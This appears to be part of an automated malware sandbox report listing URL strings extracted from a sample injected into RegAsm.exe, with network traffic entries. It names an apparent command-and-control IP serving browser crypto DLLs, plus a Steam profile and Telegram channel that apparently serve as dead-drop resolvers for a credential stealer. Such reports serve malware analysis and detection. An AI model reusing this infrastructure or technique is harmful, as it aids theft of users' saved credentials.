Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: mozglue.dll.1.dr, mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://95.217.246.168
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/Y
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/freebl3.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/freebl3.dllS
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/mozglue.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/mozglue.dll1
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dllC
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dlly
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/nss3.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/softokn3.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/softokn3.dllk
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/sqln.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/vcruntime140.dll
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/vcruntime140.dllv
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168IEG
Source: HDBGHDHC.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: HDBGHDHC.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HDBGHDHC.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HDBGHDHC.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: HDBGHDHC.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HDBGHDHC.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HDBGHDHC.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000001.00000002.2794775836.000000000159D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/kI
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2794775836.000000000159D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
Source: RegAsm.exe, 00000001.00000002.2794775836.000000000159D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543I~
Source: file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp, HIDHIEGI.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: HIDHIEGI.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp, HIDHIEGI.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: HIDHIEGI.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82
Source: file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82At
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: HDBGHDHC.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: HDBGHDHC.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
